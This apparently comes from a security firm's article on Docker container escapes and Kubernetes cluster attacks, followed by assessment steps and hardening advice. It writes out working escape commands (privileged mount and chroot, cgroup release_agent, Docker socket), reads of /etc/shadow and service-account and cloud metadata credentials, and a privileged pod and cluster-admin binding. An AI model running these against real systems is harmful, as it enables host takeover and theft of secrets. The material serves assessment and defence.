Container Security: Escaping Docker and Attacking Kubernetes
Containers run on shared kernels. Unlike virtual machines, which interpose a hypervisor between a guest operating system and the hardware, containers share the host kernel directly. The isolation that makes containers appear separate comes from Linux namespaces and cgroups — kernel features that restrict visibility and resource access, not features that enforce hard security boundaries.
This distinction matters for security assessments. A misconfigured container is not just a compromised application. It is a foothold on the host, and in an orchestrated environment, potentially a path to every workload in the cluster.
The Privilege Hierarchy in Containerized Environments
Before examining specific escape paths, it helps to understand what "full compromise" means in each layer of a containerized stack.
Container process compromise means code execution within the container's filesystem and namespace with the container's privileges. The attacker can read files the application can read, make network connections the container's network policy allows, and interact with any APIs the container's service account can reach.
Host compromise means the container's isolation has been bypassed and the attacker has access to the underlying node — its filesystem, its processes, its network interfaces, and any other workloads running on it.
Cluster compromise means the attacker can deploy workloads, read secrets, and control configuration across the entire Kubernetes cluster, regardless of which namespace or node they started on.
Container escapes move an attacker from the first level to the second. Kubernetes misconfigurations often provide a direct path to the third.
Docker Container Escapes
Privileged Containers
The most direct path from container to host is the --privileged flag. A container launched with docker run --privileged has all Linux capabilities enabled, no seccomp profile enforced, and no AppArmor restrictions applied. The container can interact with the host kernel as if it were running natively.
The canonical escape is straightforward:
# Inside a privileged container
fdisk -l # identify host block devices
mkdir /mnt/host
mount /dev/xvda1 /mnt/host # mount the host filesystem
chroot /mnt/host # enter the host root

After the chroot, the attacker operates in the host filesystem with root privileges. Adding a backdoor user, writing an SSH authorized key, or installing a cron job is trivial from this position.
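Whether a container is privileged (or at least over-capable) can often be determined from inside before attempting an escape. A minimal sketch that tests for CAP_SYS_ADMIN in the effective capability mask — the exact full-set mask varies by kernel version, so treat this as a heuristic, not a definitive check:

```shell
#!/bin/bash
# Heuristic check for an over-capable container: test whether
# CAP_SYS_ADMIN (capability bit 21) appears in the effective capability
# mask. Privileged containers carry the full capability set; the default
# Docker set (e.g. 00000000a80425fb) does not include CAP_SYS_ADMIN.

has_cap_sys_admin() {
  local mask=$((16#$1))       # $1: hex CapEff value from /proc/<pid>/status
  (( (mask >> 21) & 1 ))      # exit 0 if bit 21 is set
}

cap_eff=$(awk '/^CapEff/ {print $2}' /proc/self/status)
if has_cap_sys_admin "$cap_eff"; then
  echo "CAP_SYS_ADMIN present -- possibly privileged"
else
  echo "CAP_SYS_ADMIN absent -- default-style capability set"
fi
```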
A second path that does not require knowing the block device is abusing host cgroup access:
# Privileged containers can write to host cgroup release agents
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1) # overlayfs upperdir: the container root as the host sees it
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "id > /output" >> /cmd # replace with actual payload
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# The release agent executes on the host when the cgroup empties

This technique executes a command on the host through the cgroup release agent mechanism without requiring the host filesystem to be mounted first.
Mounted Docker Socket
The Docker socket (/var/run/docker.sock) is the Unix socket through which Docker clients communicate with the Docker daemon. The daemon runs as root and has full control over every container on the host.
When a container has the Docker socket bind-mounted into it — a practice common in CI/CD environments where pipelines need to build and run containers — any process in that container can talk to the Docker daemon directly.
# Inside a container with /var/run/docker.sock mounted
docker run -v /:/host -it --rm ubuntu:22.04 chroot /host

This single command, executed from inside a container with socket access, launches a new container with the host filesystem bind-mounted at /host, then chroots into it for a shell with host root access. The container process effectively controls the Docker daemon and can use it to escape.
Testing for a mounted Docker socket requires only checking whether the path exists and is writable. Curl against the Docker API socket confirms accessibility:
curl --unix-socket /var/run/docker.sock http://localhost/version

A successful response confirms full Docker API access and immediate host compromise potential.
Host Namespace Sharing
Docker allows specific host namespaces to be shared with containers: --pid=host, --network=host, --ipc=host. Each trades isolation for capability in ways that create security exposure.
--pid=host is particularly dangerous from an assessment perspective. A container with host PID namespace access can see all processes running on the host and send signals to them. More practically, it can access /proc/<pid>/root for any host process, which is a symlink to the root filesystem of the process's mount namespace — the host filesystem:
# Inside a container with --pid=host
ls /proc/1/root/ # lists the host root filesystem
cp /proc/1/root/etc/shadow /tmp/shadow # reads the host shadow file

--network=host places the container in the host's network namespace, making it possible to listen on host ports and access host network interfaces directly — bypassing any container network policy that would otherwise restrict traffic.
Kubernetes Cluster Attacks
Service Account Token Abuse
Every Kubernetes pod runs under a service account. Unless the pod spec sets automountServiceAccountToken: false, a JWT token for the service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
The token can authenticate to the Kubernetes API server:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc
# Enumerate what the service account can do
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" \
"$APISERVER/api/v1/namespaces/default/secrets"

The critical question is what RBAC permissions are bound to the service account. Even if no explicit role binding exists, Kubernetes ships with a system:discovery ClusterRole that is bound to all authenticated users by default, allowing the token to enumerate which API groups, versions, and resource types the cluster serves.
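The token itself is a JWT whose payload claims identify the namespace and service account it belongs to, which is worth reading before touching the API at all. A small sketch that base64url-decodes the payload segment — inspection only, no signature verification:

```shell
#!/bin/bash
# Decode the payload (second dot-separated segment) of a JWT. Service
# account tokens carry claims naming their namespace and service account;
# this reads them without verifying the signature.

jwt_payload() {
  local seg
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')  # base64url -> base64
  case $(( ${#seg} % 4 )) in                            # restore stripped padding
    2) seg="$seg==" ;;
    3) seg="$seg=" ;;
  esac
  printf '%s' "$seg" | base64 -d
}

TOKEN_PATH=/var/run/secrets/kubernetes.io/serviceaccount/token
[ -f "$TOKEN_PATH" ] && jwt_payload "$(cat "$TOKEN_PATH")" || echo "no token mounted"
```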
More dangerous is the common pattern of binding the cluster-admin ClusterRole to the default service account in a namespace, or granting secrets:get to a service account that runs an application with untrusted input. With secrets:get on the cluster scope, the token can read every secret in every namespace — including other applications' database credentials, TLS private keys, and tokens for external services.
RBAC Privilege Escalation
RBAC misconfigurations fall into predictable patterns. The most impactful:
Wildcard permissions on resources. A role with verbs: ['*'] on resources: ['*'] is equivalent to cluster-admin for the service account. Wildcards in RBAC rules appear frequently when administrators create roles quickly and intend to restrict them later.
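The pattern looks like this (role name hypothetical):

```yaml
# Functionally equivalent to cluster-admin for whoever it is bound to.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: temp-fix   # hypothetical name; often created "just to unblock"
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
```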
Create-pod access. A service account that can create pods can create a privileged pod with hostPID: true, hostNetwork: true, and a hostPath volume mounting the host filesystem. This is a full host escape through the API server:
apiVersion: v1
kind: Pod
metadata:
  name: escape   # any name
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: escape
    image: ubuntu
    command: ["/bin/bash"]
    args: ["-c", "chroot /host bash"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /

Manage-roles or bind-clusterroles access. The ability to create or modify role bindings is effectively the ability to grant oneself any permission in the cluster. An attacker with create on rolebindings can create a binding that grants cluster-admin to their service account.
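The escalation takes a single object (names hypothetical):

```yaml
# Grants cluster-admin to the attacker-controlled service account.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: metrics-reader   # innocuous-looking name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
```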
Exec into pods. The pods/exec subresource allows attaching to running containers. An attacker with this permission can execute commands in any pod in scope — including sensitive workloads like database administrators, secrets managers, or monitoring agents.
etcd Access
etcd is the key-value store that Kubernetes uses to persist all cluster state — including every Secret object, every Service Account token, and all configuration. By default, Kubernetes secrets are stored in etcd with only base64 encoding, not encrypted at rest.
An attacker with network access to the etcd endpoint (typically port 2379) and a valid client certificate can dump the entire cluster state:
etcdctl --endpoints=https://etcd-host:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get / --prefix --keys-only

etcd should only be accessible from the API server and should require mutual TLS with a restricted CA. Assessment targets where etcd listens on a broader interface, or where the certificates are accessible from within a compromised pod, represent critical findings.
Cloud Metadata Endpoint Access
In cloud-managed Kubernetes environments, each node is a cloud instance with an associated instance metadata endpoint. On AWS, this is the Instance Metadata Service at 169.254.169.254. On GCP it is metadata.google.internal. On Azure it is 169.254.169.254 with a different API.
The metadata endpoint returns temporary credentials for the instance's IAM role without authentication. If the node's instance role has permissions beyond what the cluster itself needs — common when operators grant broad cloud API access for node autoscaling, load balancer management, or storage provisioning — any pod running on that node can retrieve those credentials:
# From inside a pod on AWS
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, then:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/node-role
# Returns AccessKeyId, SecretAccessKey, SessionToken

With these credentials, the attacker can make calls to the cloud API with the permissions of the node role — potentially listing and downloading S3 buckets, describing EC2 infrastructure, assuming other IAM roles, or escalating further within the cloud environment.
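The credentials response is a flat JSON document whose fields map directly onto the environment variables the AWS CLI and SDKs read. A sketch using a fabricated sample response in place of a live metadata call — the crude `json_field` extractor is illustrative only:

```shell
#!/bin/bash
# Map an IMDS security-credentials response onto the standard AWS
# environment variables. The sample response below is fabricated; a real
# one is returned by the metadata endpoint's security-credentials path.

creds='{"AccessKeyId":"ASIAFAKEKEY","SecretAccessKey":"fakeSecret","Token":"fakeToken"}'

json_field() {   # crude single-key extractor; adequate for flat IMDS JSON
  printf '%s' "$1" | sed -n "s/.*\"$2\":\"\([^\"]*\)\".*/\1/p"
}

export AWS_ACCESS_KEY_ID=$(json_field "$creds" AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(json_field "$creds" SecretAccessKey)
export AWS_SESSION_TOKEN=$(json_field "$creds" Token)
```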
IMDSv2 (AWS) requires a session-oriented request with a token obtained via PUT, which adds a layer of protection. But it only applies if explicitly configured. Clusters that have not enforced IMDSv2 on their node groups remain exposed.
Network policy can block pods from reaching 169.254.169.254, but only if network policy is enforced and the relevant egress rules are present.
Assessment Methodology
A container security assessment follows a consistent progression from the inside out.
From within a pod:
- Read the mounted service account token and query the API server — enumerate what the token can do
- Check for /var/run/docker.sock — its presence enables immediate host compromise
- Check the pod's security context: cat /proc/1/status | grep Cap reveals current capabilities; privileged: true is directly observable from inside
- Attempt to reach the cloud metadata endpoint — a successful response warrants credential retrieval and cloud privilege analysis
- Check environment variables for secrets passed as env vars rather than volumes
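The in-pod checks above can be bundled into a small read-only triage script. A sketch — the full-capability mask it greps for is kernel-dependent, so that check is a heuristic:

```shell
#!/bin/bash
# Read-only in-pod triage for the escape indicators discussed above.
# Prints a "[!]" line per finding; makes no changes to the environment.

triage() {
  [ -S /var/run/docker.sock ] && echo "[!] docker socket mounted"
  [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ] \
    && echo "[!] service account token mounted"
  grep -qE '^CapEff:[[:space:]]*0000003fffffffff' /proc/self/status 2>/dev/null \
    && echo "[!] full capability set (likely privileged)"  # mask varies by kernel
  env | grep -qiE 'pass|secret|token|key' \
    && echo "[!] possible secrets in environment variables"
  echo "triage complete"
}
triage
```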
From the Kubernetes API:
- Enumerate ClusterRoleBindings for the default service account and any application service accounts
- Look for any subject with create access to pods, role bindings, or cluster role bindings
- Check for secrets accessible to assessed service accounts — the presence of dockerconfigjson secrets or cloud credentials in secrets indicates infrastructure-level access
- Review admission controller configuration — the absence of a Pod Security admission policy or OPA/Gatekeeper allows arbitrary pod specs, including privileged workloads
Infrastructure review:
- Confirm etcd is not accessible from the pod network
- Confirm the API server's --anonymous-auth flag is set to false
- Verify that node instance roles follow least privilege
- Check whether network policy enforces egress restrictions to the metadata endpoint
Hardening Guidance
The most impactful mitigations reduce the blast radius when a workload is compromised.
Disable service account token auto-mounting for pods that do not need API server access. Set automountServiceAccountToken: false in the pod spec or the service account itself.
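At the service account level this is a one-line field (names hypothetical):

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-sa        # hypothetical name
  namespace: app-team # hypothetical namespace
automountServiceAccountToken: false
```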
Apply Pod Security Standards using Kubernetes' built-in admission controller. The restricted profile prohibits privileged containers, host namespace sharing, and host volume mounts. The baseline profile blocks the most common escape vectors while permitting most legitimate workloads.
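The standards are applied per namespace via labels, for example:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: app-team   # hypothetical namespace
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
```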
Enforce least-privilege RBAC. Audit ClusterRoleBindings regularly. The default service account should have no bindings beyond the cluster defaults. Application service accounts should have narrowly scoped roles in their namespace only.
Block cloud metadata endpoints with network policy egress rules that deny traffic to link-local addresses from all pods except those that specifically require it.
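A minimal egress policy of this shape accomplishes that (namespace name hypothetical; requires a CNI plugin that actually enforces NetworkPolicy):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata
  namespace: app-team   # hypothetical namespace
spec:
  podSelector: {}       # applies to all pods in the namespace
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
```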
Enable etcd encryption at rest using Kubernetes' EncryptionConfiguration. An attacker who reaches etcd directly or obtains an etcd backup then sees ciphertext rather than plaintext secrets. It does not help against an attacker who can already read secrets through the API server, which decrypts transparently.
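A minimal EncryptionConfiguration has the following shape (key material elided):

```yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
  - secrets
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: <base64-encoded 32-byte key>
  - identity: {}   # fallback so pre-existing plaintext data remains readable
```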
Audit container images for setuid binaries and excessive capabilities. The presence of nsenter, mount, fdisk, or other administrative binaries in a container image expands the options available to an attacker who achieves code execution.
Container security is layered. No single control makes a cluster uncompromisable. The goal is to ensure that a container compromise does not automatically translate to host or cluster compromise — and that each step toward escalation is visible in logs.
For a technical assessment of your containerized infrastructure, get in touch.